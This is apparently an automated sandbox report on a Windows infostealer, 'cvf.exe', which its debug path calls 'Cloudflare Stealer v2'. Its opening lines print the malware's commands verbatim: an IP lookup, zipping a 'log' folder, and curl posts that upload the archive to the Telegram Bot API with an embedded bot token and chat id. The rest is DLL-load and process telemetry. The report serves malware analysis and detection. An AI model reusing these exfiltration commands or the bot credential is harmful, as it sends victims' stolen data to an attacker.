Source: C:\Users\user\Desktop\cvf.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com resolver1.opendns.com | findstr Address | findstr /V resolver1.opendns.comJump to behavior
Source: C:\Users\user\Desktop\cvf.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.jsonJump to behavior
Source: C:\Users\user\Desktop\cvf.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.jsonJump to behavior
Source: C:\Users\user\Desktop\cvf.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "Compress-Archive -Path 'C:\Users\user\Desktop\log\\*' -DestinationPath 'C:\Users\user\Desktop\log.zip' -Force"Jump to behavior
Source: C:\Users\user\Desktop\cvf.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com resolver1.opendns.com | findstr Address | findstr /V resolver1.opendns.comJump to behavior
Source: C:\Users\user\Desktop\cvf.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendDocument" -F "chat_id=" -F "document=@C:\Users\user\Desktop\log.zip" -F "caption=New Log!"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup myip.opendns.com resolver1.opendns.comJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr AddressJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V resolver1.opendns.comJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.jsonJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr Address
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V resolver1.opendns.com
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Compress-Archive -Path 'C:\Users\user\Desktop\log\\*' -DestinationPath 'C:\Users\user\Desktop\log.zip' -Force"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendDocument" -F "chat_id=-4798834305" -F "document=@C:\Users\user\Desktop\log.zip" -F "caption=New Log!"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendDocument" -F "chat_id=" -F "document=@C:\Users\user\Desktop\log.zip" -F "caption=New Log!"Jump to behavior
Source: C:\Users\user\Desktop\cvf.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\cvf.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\cvf.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\cvf.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\cvf.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\cvf.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: cvf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: cvf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: cvf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: cvf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: cvf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: cvf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: cvf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: cvf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\skar\Desktop\CloudflareStealer V2\Cloudflare Stealer v2\Release\Cloudflare Stealer v2.pdb9 source: cvf.exe
Source: Binary string: C:\Users\skar\Desktop\CloudflareStealer V2\Cloudflare Stealer v2\Release\Cloudflare Stealer v2.pdb source: cvf.exe
Source: cvf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: cvf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: cvf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: cvf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: cvf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\cvf.exeCode function: 0_2_00BC9199 push ecx; ret 0_2_00BC91AC

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
